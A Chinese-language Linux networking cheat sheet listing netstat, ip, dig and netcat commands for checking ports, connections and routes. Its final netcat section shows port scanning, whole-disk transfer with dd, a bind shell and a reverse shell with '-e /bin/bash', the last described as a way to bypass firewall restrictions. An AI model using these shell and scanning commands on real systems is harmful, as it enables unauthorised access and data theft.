这个快速参考备忘单提供了使用 Linux 网络连接 常用命令的使用清单
参数 | action |
---|---|
ifconfig | 显示所有网络接口的IP地址 |
netstat -pnltu | 显示所有活动监听端口 |
netstat -anp | 查找不常用的监听端口 |
ip link | grep PROMISC | 查找监听模式的网卡 |
lsof -i | 运行的进程监听了端口 |
arp -a | ARP表 |
route -n | 路由表 |
:--- | :--- |
---|---|
ip addr show | 显示IP地址和所有网络接口 |
ip address add 192.168.0.1/24 dev eth0 | 将IP地址192.168.0.1分配给接口eth0 |
ping host | ping命令发送ICMP回送请求以建立到服务器/PC的连接 |
hostname -i | 显示本地IP地址 |
:--- | :--- |
---|---|
whois domain | 检索有关域名的更多信息 |
dig domain | 检索关于域的DNS信息 |
dig -x host | 对域执行反向查找 |
host google.com | 执行域名的IP查找 |
wget file_name | 从在线资源下载文件 |
traceroute -n ip | 追踪网络路由途径 |
端口 80 上的所有连接
$ netstat -anp | grep :80
网络统计帮助
$ netstat -h
选项 | 说明 |
---|---|
netstat -ltunp | 所有监听端口 |
netstat -ltn | 监听 TCP 端口 |
netstat -lun | 监听 UDP 端口 |
netstat -lx | 监听 Unix 端口 |
netstat -lt | 仅列出侦听 TCP 端口 |
netstat -lu | 仅列出侦听 UDP 端口 |
netstat -l | 列出所有监听条件 |
选项 | 说明 |
---|---|
netstat -a | 所有连接 |
netstat -at | 所有 TCP 连接 |
netstat -au | 所有 UDP 连接 |
netstat -ant | 显示没有反向 DNS 查找的 IP 地址 |
选项 | 说明 |
---|---|
netstat | 活动连接 |
netstat -a | 所有连接 |
netstat -at | 所有 TCP 连接 |
netstat -au | 所有 UDP 连接 |
netstat -ant | 显示没有反向 DNS 查找的 IP 地址 |
netstat -tnl | 监听 TCP 端口 |
netstat -unl | 监听 UDP 端口 |
选项 | 说明 |
---|---|
netstat -i | 显示网络接口 |
netstat -ie | 显示网络接口扩展信息 |
netstat -n | 仅显示 IP 地址 |
netstat -F | 尽可能显示 IP 地址的域名 |
选项 | 说明 |
---|---|
netstat -r | 显示路由表 |
netstat -rn | 显示路由表,不解析主机 |
选项 | 说明 |
---|---|
netstat -s | 显示统计信息 |
netstat -st | 显示 TCP 统计信息 |
netstat -su | 显示 UDP 统计信息 |
netstat -ltpe | 使用进程信息和扩展信息显示 TCP 的侦听连接 |
netstat -tp | 显示带有 PID 编号的服务名称 |
sudo netstat -nlpt | 列出进程名称/PID 和用户 ID |
netstat -nlptue | 所有带有 PID 和扩展信息的侦听端口 |
netstat -M | 显示伪装的连接 |
$ netstat --tcp --numeric
$ netstat -atnp | grep ESTA
$ watch -d -n0 "netstat -atnp | grep ESTA"
$ netstat -anp | grep":"
插入端口
号(上图)代替冒号 :
$ sudo netstat -aple | grep ntp
你可以用http
、smtp
代替ntp
$ netstat -tn 2>/dev/null | grep :80 | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -nr | head
$ netstat -tn 2>/dev/null | grep ':80 ' | awk '{print $5}' |sed -e 's/::ffff://' | cut -f1 -d: | sort | uniq -c | sort -rn | head
$ netstat -an |grep :80 |wc -l
$ netstat -antu | grep :80 | grep -v LISTEN | awk '{print $5}'
以下命令将输出服务器上正在发生和正在发生的活动 SYNC_REC
数量。数量应该很低(小于 5
)。如果该数字为两位数,则您可能正在遭受 DoS
攻击或被邮件轰炸。
$ netstat -n -p|grep SYN_REC | wc -l
$ netstat -n -p | grep SYN_REC | awk '{print $5}' | awk -F: '{print $1}'
与上面的命令一样,该命令也列出了发送 SYN_REC
连接状态的节点的所有唯一 IP
地址
$ netstat -antu | awk '{print $5}' | awk -F: '{print $1}' | sort | uniq -c | sort -n
或者
$ netstat -antu | awk '$5 ~ /[0-9]:/{split($5, a, ":"); ips[a[1]]++} END {for (ip in ips) print ips[ip], ip | "sort -k1 -nr"}'
$ netstat -plntu
$ netstat -plnt
$ netstat -an | grep 80 | wc -l
$ netstat -pnut -w | column -t -s $'\t'
连接到位于任何地方的主机
$ nc [options] [host] [port]
监听传入连接
$ nc -lp port [host] [port]
选项 | 示例 | 说明 |
---|---|---|
-h | nc -h | 帮助 |
-z | nc -z 192.168.1.9 1-100 | 端口扫描主机或 IP 地址 |
-v | nc -zv 192.168.1.9 1-100 | 提供详细输出 |
-n | nc -zn 192.168.1.9 1-100 | 通过禁用 DNS 解析进行快速扫描 |
-l | nc -lp 8000 | TCP 侦听模式 (用于入站连接) |
-w | nc -w 180 192.168.1.9 8000 | 定义超时值 |
-k | nc -kl 8000 | 断线后继续收听 |
-u | nc -u 192.168.1.9 8000 | 使用 UDP 而不是 TCP |
-q | nc -q 1 192.168.1.9 8000 | 客户在 EOF 后熬夜 |
-4 | nc -4 -l 8000 | 仅限 IPv4 |
-6 | nc -6 -l 8000 | 仅限 IPv6 |
服务器 Server (192.168.1.9)
$ nc -lv 8000
客户端 Client
$ nc 192.168.1.9 8000
$ nc website.com 80
GET index.html HTTP/1.1
HEAD / HTTP/1.1
或者
echo "" | nc -zv -wl 192.168.1.1 801-805
扫描 21
到 25
之间的端口
$ nc -zvn 192.168.1.1 21-25
扫描端口 22
、3306
和 8080
$ nc -zvn 192.168.1.1 22 3306 8080
$ nc -lp 8001 -c "nc 127.0.0.1 8000"
或者
$ nc -l 8001 | nc 127.0.0.1 8000
创建从一个本地端口到另一个本地端口的隧道
服务器 Server (192.168.1.9)
$ nc -lv 8000 < file.txt
客户端 Client
$ nc -nv 192.168.1.9 8000 > file.txt
假设您想将文件 file.txt
从服务器 A 传输到客户端 B。
服务器 Server (192.168.1.9)
$ nc -lv 8000 > file.txt
客户端 Client
$ nc 192.168.1.9 8000 < file.txt
假设您想将文件 file.txt
从客户端 B
传输到服务器 A
服务器 Server (192.168.1.9)
$ tar -cvf – dir_name | nc -l 8000
客户端 Client
$ nc -n 192.168.1.9 8000 | tar -xvf -
假设您想通过网络将目录从 A
传输到 B
服务器 Server (192.168.1.9)
$ nc -l 8000 | openssl enc -d -des3 -pass pass:password > file.txt
客户端 Client
$ openssl enc -des3 -pass pass:password | nc 192.168.1.9 8000
在通过网络传输之前加密数据
服务器 Server (192.168.1.9)
$ dd if=/dev/sda | nc -l 8000
客户端 Client
$ nc -n 192.168.1.9 8000 | dd of=/dev/sda
克隆 linux PC 非常简单。假设你的系统盘是 /dev/sda
服务器 Server (192.168.1.9)
$ cat video.avi | nc -l 8000
客户端 Client
$ nc 192.168.1.9 8000 | mplayer -vo x11 -cache 3000 -
使用 netcat 流式传输视频
服务器 Server (192.168.1.9)
$ nc -lv 8000 -e /bin/bash
客户端 Client
$ nc 192.168.1.9 8000
我们已经使用 telnet
和 ssh
使用远程 Shell
,但是如果它们没有安装并且我们没有安装它们的权限,那么我们也可以使用 netcat
创建远程 shell
服务器 Server (192.168.1.9)
$ nc -lv 8000
客户端 Client
$ nc 192.168.1.9 8000 -v -e /bin/bash
反向 shell
通常用于绕过防火墙限制,例如阻止入站连接